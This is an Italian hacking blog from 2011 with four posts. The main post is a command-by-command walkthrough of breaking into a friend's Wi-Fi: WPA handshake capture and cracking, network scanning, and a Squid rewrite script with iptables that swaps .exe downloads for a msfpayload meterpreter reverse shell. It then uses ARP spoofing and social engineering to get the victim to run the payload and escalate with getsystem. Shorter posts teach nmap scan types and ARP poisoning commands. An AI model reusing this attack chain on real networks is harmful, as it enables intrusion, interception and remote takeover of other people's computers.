domenica 10 aprile 2011

[Attacco Reale 1] Cronaca

salve a tutti, oggi pomeriggio ho vinto una birra ( tramite scommessa ) ? ecco qui la guida per vincere una birra :)
ecco come vincere una birra (=

durante un dibattito lui diceva che la sua password del wifi ( quella di default del router vodafone ) era inviolabile, e che anche uno si fosse connesso non avrebbe potuto creargli problemi perchè aveva windows SP 3 , quindi abbiamo fatto una scommessa che non era cosi, lui mi ha detto che potevo provare ad entrargli , e se ci fossi riuscito mi offriva una lime corona 
ok iniziamo:

allora prima di tutto

TOOL REQUIREMENT:

  • NMap ( Included on bt4 or bb )
  • Ettercap ( Included on bt4 or bb )
  • CoWPAtty ( coded by god )
  • Rainbow tables ( in questo caso della vodafone e quindi http://www.megaupload.com/?d=IGN8BQN3 )
  • Squid3 ( reposity debian-based )
  • Metasploit
  • Apache2
ok iniziamo:
per prima cosa ho attivato il monitor di aircrack
airmon-ng start wlan0
e poi ho scansionato fino a trovare il suo bssid , essid , channel, e un client ( il suo telefono nokia ) connesso tramite:
airodump-ng mon0
ok poi specifichiamo il range di airodump tramite:
airodump-ng --channel CHANNEL --bssid BSSID --write file mon0
e ho deauthenticato il suo cellulare dalla rete
aireplay-ng --deauth 1 -a BSSID -c CLIENT_DA_DEAUTHENTICARE_MAC mon0
ok ottenuto l'handshake WPA, diamo il file cap in pasto a coWPAtty (=
cowpatty -s ESSID -r file.cap -d vodafone
aspetto un pò di minuti , e tatata ecco la sua password! =)
bon connetttiamoci alla sua rete:
wpa_passphrase ESSID PASSWORD > amico.conf
wpa_supplicant -Dwext -iwlan0 -c /root/amico.conf
dhclient wlan0
ok sono connesso YO ,
ok iniziamo con il trovare tutti gli host connessi ^^
nmap -sP -T4 -n 192.168.1.1-255

trovo 4 target
192.168.1.1 # Router192.168.1.2 # (= io192.168.1.3 # Suo fisso192.168.1.4 # Suo nokia

ok allora per prima cosa, provo un metasploit autopwn =) che non darà nessun esito
/etc/init.d/postgresql start
  aprite da root il terminale psql e creo l'utente:
ALTER USER saeko WITH PASSWORD 'banana';
\q
ok aprite msfconsole
db_driver postgresql
db_connect saeko:"banana"@localhost/msf
db_nmap -sS -T4 -O 192.168.1.3
db_autopwn -x -e -R great

ma nulla....
allora proviamo una strategia stranaaa! (=
avviamo apache2, in /var/www
creiamo un file .htaccess con questo:
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) exploit.exe
a cosa serve? semplice per reindirizzare tutte le pagine sul nostro eseguibile  exploit.exe che ora creeremo ^^ ok apriamo
 msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 X > /var/www/exploit.exe
ora avviamo apache2:
/etc/init.d/apache2 start
ora ho modificato squid3 in maniera da permettere il suo funzionamento pure sulle reti locali, basta cercare localnet e decomentare la propria sottorete, e poi attivare tramite decomentazione di http_access allow localnet , e poi cerchiamo 3128, e aggiungiamo transparent (= e infondo mettiamo:
url_rewrite_program /percorso/prossimoscript.pl
il prossimo script formato cosi:

use IO::Handle;
use File::Basename;

$myip = "192.168.1.2";
while (<>) {
   chomp $_;
   if ($_ =~ /(.*\.exe)/i) {
      $file = basename( $1 );
      $new_url = "http://$myip/$file";
      print "$new_url\n";
   }
   else {
      print "$_\n";
   }
}

avviamolo
/etc/init.d/squid3 restart
ora settiamo iptables sul nostro pc
iptables -t nat -a PREROUTING --in-interface wlan0 -p tcp --destination-port 80 --jump REDIRECT --to-port 3128echo 1 > /proc/sys/net/ipv4/ip_forward
ok ora ho iniziato un attacco di tipo arp spoofing ( spiegato nel precedente articolo )

con:
ettercap -T -M arp -i wlan0 // /192.168.1.2/
ho avviato multi/handler da msfconsole
use exploit/multi/handlerset LHOST 0.0.0.0exploit -j
poi con una scusa gli ho fatto scaricare firefox 4, dello stile, comunque veramente una meraviglia sto firefox 4, lui : davvero va cosi bene? aspetta che lo provo! cosi è caduto nella mia trappola, ha scaricato un exe, che non era l'installer di firefox 4 ma il nostro exploit.exe

e di poi lifeissimple, aperta la sessione meterpreter, spari un getsystem e hai vinto...

Saeko

Nmap, questo conosciuto

salve a tutti, in questo articolo cercherò di spiegare come effettuare Information Gathering e Network Mapping con nmap, ossia come ben sapete un test di sicurezza è diviso in varie fasi, le prime 2 sono sicuramente Information Gathering e Network Mapping , che consistono rispettivamente, nel cercare di ricavare più informazioni possibili sul target e la seconda invece tratta di mappare la rete, ossia trovare possibili indirizzi , porte aperte o porte chiuse ecc...

tool requirement:
  • NMap ( incluso in tutte le distro di sicurezza: bt o bb )
Comandi:

nmap [opzioni] hosts

sono permessi range di hosts, ossia per effettuare lo scan di tutti gli indirizzi locali della rete 192.168.1.1 a 192.168.1.255 è possibile usare questi range:
192.168.1.*
192.168.1.1-255
192.168.1.0/24

ok andiamo a vedere i tipi di scan

Syn Scan (-sS ):
è la modalità di default, garantisce un anonimato e prestazioni elevate poichè non si instaura una connessione con l'host , ma viene inviato un pacchetto Syn, e si analizza la risposta:
  • Aperta: Si riceve un pacchetto syn/ack
  • Chiusa: Si riceve un pacchetto rcset
  • Filtrata: non si riceve risposta 
Connect Scan ( -sT ): 
è la modalità di default per le scansioni non root, poco sicura e poco prestante, poichè viene instaurata una connessione alle varie porte

Ack Scan ( -sA ):
vengono inviati pacchetti ack, non mostra porte aperte

Udp Scan ( -sU ):
viene inviato un pacchetto upd vuoto, e anche qua si analizza la risposta:
  • Aperta: Si riceve un pacchetto upd
  • Chiusa: Si riceve un errore ICMP
  • Filtrata: Si riceve un errore ICMP Particolare

XMas Scan , Tcp null o FIN ( rispettivamente: -sX -sN -sF ):

identiche allo scan SYN , ma permettono di superare alcuni firewall , ATTENZIONE non funziona sotto i sistemi windows

Idle Scan ( -sI ):
Scan anonimo, non ne so molto (=

Speed ( -T1, -T2, -T3, -T4, -T5 ):
Varie velocità di scan, variano da -T1 ( paranoico ) usato per evitare di far scattare i sistemi anti-intrusione , o -T5 ( insano ) usato solamente su reti veloci

Ping Scan ( -sP ):
pinga il target, e rileva se è UP non rivela le porte

NON PING Scan ( -PN ):
non pinga il target, serve per particolari tipi di scan

OS Scan ( -O ):
individua il sistema operativo target in base ai servizi e alle risposte ottenute


queste sono le modalità principali di scan, poi esistono alcune opzioni, tipo:
  • -f : frammenta gli header in maniera da renderli irriconoscibili ai firewall
  • -p: Range di porte



Saeko

sabato 9 aprile 2011

Arp Poisoning

scrivo questo breve articolo per spiegare brevemente di cosa si tratta, però c'e prima da fare una breve introduzione ai protocolli di rete (=

il protocollo ARP serve per "mappare" in maniera dinamica gli indirizzi, cioè svolgendo una specie di centralino, ossia IP-to-MAC
cosa è IP?
IP sta per Internet Protocol e consiste nel protocollo base per lo scambio delle informazione sulla rete, si presenta a 32 bit nella versione 4, nella futura versione 6 a 64 bit, è formato da 4 numeri che posso variare da 0 a 255 separati da un punto, e.g.  192.168.1.1 


MAC sta invece per Media Access Control , e consiste in un indirizzo a 48 bit, unico per ogni scheda di rete, e.g. 00:11:22:33:44:55 , come potete vedere sono 6 parti separate da ":" , e ogni cifra o lettera della parte può assumere un valore compreso tra 0..9 e a..e

ok dopo questa breve introduzione andiamo a vedere lo scenario:
di norma dovrebbe funzionare cosi:
ok ora l'attacker sfruttando arpspoofing, riesce ad interporsi tra ROUTER e VICTIM cosi:
quindi intercettando tutti i pacchetti che il computer VICTIM riceve o invia ^^ vediamo come attuare questa tecnica:
il metodo più semplice è sicuramente ettercap quindi digitiamo:

ettercap -T -M arp -i eth0 /iprouter/ /iptarget/


oppure in caso possiamo usare arpspoofing, con questa sintassi:

arpspoof -i eth0 -t TARGET ROUTER


possiamo tranquillamente visualizzare i dati cosi ricevuti tramite wireshark, o xplico ^^




saeko

Site new!

SALVE E BENVENUTI

questo è il mio primo post, questo blog non nasce come guida passo-passo per le operazioni basiliari di windows , quindi evitate commenti del tipo: dove scarico l'exe di quel programmino, anche perchè tutti i test saranno svolti da macchine linux, beh da cosa posso iniziare? ah vero le wordlist

per wordlist si intende un file ascii o binario contentente X word ossia possibili password, usate nelle funzioni di brutalforce.
ecco quelle che uso di solito:

nel caso che vogliate wordlist più grandi, magari per "trovare" la password wireless, vi consiglio
questo oppure questo ...

sistemi operativi, ok iniziamo subito con il dire che uso solo sistemi operativi liberi, per via della mia mentalità secondo la quale , mi chiedo: in Africa c'e gente che muore di fame, perché devo dare 400 euro ad il secondo uomo più ricco del pianeta per un sistema mal progettato e non funzionante?
quindi uso:
  1. Kubuntu 10.10 ( Alleggerito e sistemato a dovere )
  2. Funtoo
  3. Backtrack Linux 4 RC2
  4. Backbox rc1
passioni, bah amo leggere manga e guardare anime , tra i miei preferiti c'e Evangelion oppure Naruto oppure ancora High School of Dead ( working in progress project ) 

beh cosa altro dire, benvenuti